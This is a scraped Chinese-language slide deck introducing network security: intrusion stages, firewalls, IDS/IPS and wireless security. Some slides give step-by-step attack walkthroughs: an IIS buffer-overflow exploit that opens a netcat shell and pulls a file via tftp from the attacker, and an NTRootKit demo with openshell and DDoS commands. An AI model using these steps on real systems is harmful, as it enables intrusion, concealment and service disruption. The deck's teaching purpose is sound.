Download presentation
Presentation is loading. Please wait.
1
網路安全概論
2
Agenda 內容大綱 資訊安全概論 防火牆 & IDS,IPS 基本網路障礙排除 無線網路安全 Q&A
3
資訊安全概論 常見的攻擊行為 駭客入侵流程分析 入侵防治 病毒與蠕蟲(Worm)攻擊 後門程式與特洛伊木馬
IP Spoofing(IP偽造) DOS,DDOS(阻斷攻擊) 駭客入侵流程分析 駭客入侵九大步驟 入侵防治
4
常見攻擊行為(1) Virus & Worm 攻擊 Backdoor & Trojan CodeRed,Nimda, SQL Slammer
Blaster Backdoor & Trojan 惡意網頁popup程式 病毒郵件 peep.exe & peepbrowser.exe win.ini、system.ini、系統服務、registry
5
常見攻擊行為(2) IP spoofing–IP假造攻擊 DOS & DDOS 拒絕服務攻擊 mendas ipspoof hunt
SYN Flood
6
DDOS攻擊示意圖
7
駭客入侵流程分析 資料蒐集 目標掃描 弱點刺探 取得初步權限 提昇權限 進行破壞 建立後門 隱藏蹤跡、消滅證據 癱瘓目標
8
1.資料蒐集:找出可供入侵的資源 網頁拜訪 Whois 社交工程 DNS zone transfer InterNIC
TWNIC( NetworkSolutions 社交工程 DNS zone transfer nslookup traceroute or tracert
9
2.目標掃描 Tools Ping Nmap SuperScan Advanced ip scanner
Advanced port scanner Icmpenum NetScan Tool Pro 2000 Netcat Strobe
10
3.弱點刺探 網路資源與分享 Net view, nbtstat, nbtscan, nltest, Legion,… 使用者與群組探查
nbtstat, enum 遠端登入程式 telnet,vnc,terminal service,pcanywhere
11
收集資訊目的 偵測目的網路的所有主機 偵測目的所提供服務 判斷目的主機服務種類(banner grabbing)
判斷目的主機之作業系統 (OS guessing) DNS區域資料 Windows 網域之NetBIOS名稱及DC Windows相關資料,如user、group、網卡數量、通訊協定。
12
4.進行滲透:取得初步權限 密碼猜測 不安全的密碼 NTIS(空白密碼) administrator, adm , test…. 字典攻擊法
SMBCrack Legion, NetBIOS Audition Tool,… 網路監聽 cain 緩衝區溢位(Buffer Overflow)攻擊 IIS
13
緩衝區溢位(Buffer Overflow)攻擊
IIS ida溢出漏洞的攻擊 工具:tftpd32, idahack, nc, whoami 步驟: Start tftpd32 進入命令提示字元模式,並切換至idahack所在目錄 輸入 “ idahack 欲攻擊目標IP 欲攻擊目標之IIS port 欲攻擊目標OS version代碼 欲開啟之連接port Nc 欲攻擊目標IP 由idahack所開啟之port Ipconfig /all /* 確認攻擊成功 */ Cd \ Tftp –I 發動攻擊HOST 之IP get whoami.exe Whoami /* 確認目前的使用者帳號 */
14
5. 提昇權限 To find Protected Storage Service
密碼猜測 網路監聽 密碼檔破解工具 Tools: pwdump2, L0phtCrack, John 將使用者加入管理者群組 getadmin, Sechole 鍵盤敲擊記錄 Keylogger To find Protected Storage Service including passwords for accounts in Microsoft Outlook, Microsoft Outlook Express, MSN Messenger, saved Internet Explorer form data . Protected Storage Explorer Protected storage passview
15
6.進行破壞 竊取破壞 置換網頁 刪除資料 跳板攻擊 攻擊知名企業或政府單位
16
7.建立後門 啟動的操控 遠端控制 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion,
\Run, \RunOnce, \RunOnceEx, \RunServices 遠端控制 Telnet service VNC,Terminal services,pcanywhere
17
8.隱藏蹤跡、消滅證據 關閉稽核 清除記錄 Elsave, ClearLogs, ClearIIsLog 隱藏檔案 Attrib
隱藏至NTFS file streaming:sfind Win2k支援,WinXP,Win2003不支援 LNS : List NTFS Streams 使用rootkit
18
使用rootkit Tool:NTRootKit 可隱藏自身及所開的port,工作管理員,netstat –an 看不到。
可進行DDOS攻擊
19
NTRootKit 攻擊演示 Victim:202.132.10.1 Attracker:131.107.100.10
在被攻擊端電腦(Victim)執行ntrootkit 在攻擊端電腦執行 nc !!!PASSWORD yyt_hac111 出現訊息:Welcome to yyt_hac's ntrootkit Server version,use '?' command to get command list CMD>? CMD>getsysinfo CMD>hidetcpport :隱藏 TCP port 135 CMD>hideudpport :隱藏 UDP port 135 CMD>openshell C:\>dir C:\>exit CMD>exit 出現訊息: exit successfully
20
攻擊結果check Netstat –an 使用fport或Active port 看TCP、UDP 135是否開啟
使用工作管理員或Taskinfo 看是否顯示ntrootkit程式 查看服務清單,是否顯示相關程式服務啟動
21
使用ntrootkit 進行DDOS攻擊 usage:rtclient destip [-p password] [-t proto] [-o port] [-y icmp_type] [-d icmp_code] [-m MTU] [-c Command] destip The computer you want to connect password The ntrootkit's password proto The proto that ntrootkit will use(0:userdefined,1:icmp,2:udp,3:tcp) port The dest udp or tcp port which send packet to(default is 445 MTU The MAX packet size the ntrootkit will use to send packet icmp_type The icmp packet type which send to server,default is ICMP_ECHO REPLY icmp_code The icmp packet code which send to server,default is 0 Command The command which you want the server to do The DDos command usage:DDOS DDos_Destip [DDos_Destport DDos_type DDos_seconds DDos_ProcCount] DDos_Destip The computer you want to DDos DDos_Destport------The Destport you want to DDos(default is 445) DDos_type The DDos type you want to use(0:ping flood,1:udp flood,2:synflood,3:mstream flood,default is 0) DDos_seconds The seconds you want to DDos the dest(default is 150s) DDos_ProcCount-----The process count which the server use to ddos(default is 10) Example: rtclient p yyt_hac -t 1 -c ddos
22
9.癱瘓目標 阻斷服務 SYN Flood IP Spoofing DDOS 郵件炸彈 Tools
Ping of death、land、teardrop、mailbomb、spam mail
23
入侵防治 制定安全政策 定期系統更新 安全網路通訊協定 定期檢查與稽核 安全設備防衛 基本快速發現及移除惡意程式方法
預防勝於治療 - 談如何防範入侵
24
制定安全政策 使用者帳號密碼原則 密碼長度 有意義字集 資料備份 異地備援 機房保全設施 監視設備
25
定期系統更新 系統與程式最小安裝與設定 安裝安全修正程式 關閉未使用的網路服務 iptables Windows update
apt-yum up2date
26
安全網路通訊協定 資料加密(Data Encryption) 認證(Authentication) 稽核(Auditing)
DES,3DES,RSA 認證(Authentication) .htaccess CGI程式 稽核(Auditing) EX. TCPWRAPPER,SSH,SSL,KERBEROS, PEM (Privacy Enhanced Mail) ,VPN
27
安全設備防衛 安裝安全防護程式 防毒/掃毒程式 防火牆 入侵偵測系統-IDS 入侵防禦系統-IPS
28
定期檢查與稽核 syslog 病毒掃描 port scan 木馬/後門程式掃描 系統網路設備弱點掃描
Ad-Aware SE Personal 具有後門程式掃描及個人隱私記錄反追蹤移除:可幫助使用者定期掃瞄自己電腦中是否有惡意程式、告程式的存在,並且讓使用者可以輕鬆移除一些記錄使用者瀏覽網頁動作的 cookie 系統網路設備弱點掃描
29
基本快速發現及移除惡意程式方法 開啟cmd.exe,輸入利用「netstat -an -p tcp」指令清查異常對外通訊的應用程式。
檢查登錄編輯器(Registry):清查HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current Version\Run等自動啟動路徑 。 檢核微軟系統目錄中(路徑大多為C:\WINNT\SYSTEM32\)是否存在下列異常檔案 。 重新開機並注意電腦對外通訊情形。
30
Why防火牆 什麼是防火牆 為什麼需要防火牆 防火牆如何管制
31
Firewall 種類 狀態檢驗式防火牆-Stateful Inspection Firewall
封包過濾防火牆-Packet filtering Firewall 效能好 易建置 Cost 低 代理伺服器防火牆-Proxy Firewall 狀態檢驗式防火牆-Stateful Inspection Firewall
32
Firewall 種類 狀態檢驗式防火牆-Stateful Inspection Firewall
封包過濾防火牆-Packet filtering Firewall 代理伺服器防火牆-Proxy Firewall 成本高 效能差 最安全 狀態檢驗式防火牆-Stateful Inspection Firewall
33
Firewall 種類 狀態檢驗式防火牆-Stateful Inspection Firewall
封包過濾防火牆-Packet filtering Firewall 代理伺服器防火牆-Proxy Firewall 狀態檢驗式防火牆-Stateful Inspection Firewall 效能較好 有最大的擴展及延伸能力 安全性高 為現行防火牆主流
34
防火牆架構 Routing-路由模式 NAT-來源位址轉換模式 Transparent-透通模式 節省IP Address
隱藏 Private IP Transparent-透通模式 簡易 網路架構變動最少
35
防火牆設定程序 前置階段 評估單位安全需求 擬定安全策略 購買經費? 建置階段 完成階段
36
防火牆設定程序 前置階段 建置階段 公司Server IP 及開放服務列表 Server Location 決定架構 完成階段
37
防火牆設定程序 前置階段 建置階段 完成階段 驗證policy 製作操作手冊
38
Security Policy 安全政策的調校 組織單位網路環境完整熟析 Policy愈簡潔愈好
Policy Loading Match優先順序
39
防火牆進階應用 Radius,Kerberos等認證 虛擬私人網路(VPN) 叢集負載平衡等功能 防範入侵和蠕蟲攻擊
40
選購Firewall須注意事項 符合企業組織需求 ? 安全性 ? 建置成本 ? 管理功能 ? 執行效率及效能 ? 擴充性 ?
事件紀錄和警告 ? 附加其他的事件報告軟體 ?
41
防火牆的限制 易成架構上之瓶頸 無法管制內部使用者破壞行為 無法有效阻止開後門的行為 無法有效阻止針對作業系統漏洞進行的入侵行為
防火牆不提供資料完整性驗證的功能
42
入侵偵測系統的基本組成 監控方法-資訊來源 分析架構 反應機制 主機型(host-based, HIDS)
網路型(network-based, NIDS) 分析架構 反應機制
43
入侵偵測系統的基本組成 監控方法(資訊來源) 分析架構 反應機制 Signature-Base Detection
Protocol-Anomaly Detection 反應機制
44
入侵偵測系統的基本組成 監控方法(資訊來源) 分析架構 反應機制 Action report
45
IDS & IPS 高度可信正常流量--允許通過 高度可信攻擊流量--阻擋 不明流量--紀錄或警示(入侵偵測) 入侵防護不能阻擾日常營運
46
基本網路障礙排除 找出問題pc或主機 判斷問題原因&排除 網路設備log Firewall log auditin 網路拔線測試
Sniffer,netxray,…網路監聽軟體 判斷問題原因&排除 worm,virus,….etc. Network looping
47
無線網路安全 無線網路安全機制 使用者認證(Authentication) 資料保密(Confidentiality)
資料完整確認(Interity) 第三者介入 通訊劫奪
48
無線網路安全 無加密認證-SSID 加密認證 開放系統認證 封閉系統認證 WEP(wired equivalent privacy)
對稱式加密系統
49
增進無線網路安全的方法 修改預設的設定 修改網路設定 預設密碼 Snmp string 預設SSID 預設的通訊頻道 網路卡號管理
防火牆區隔網段 802.1X使用者認證
50
網路嵌入式伺服晶片簡介 更方便管理 更加安全 多元化服務 圖形管理介面 SSL,SSH
MAIL,DNS,WWW,FTP,NAT,MYSQL, Openwebmail,Samba,proxy…etc
51
Reference 木馬防護全攻略, 程秉輝 ,上奇
Similar presentations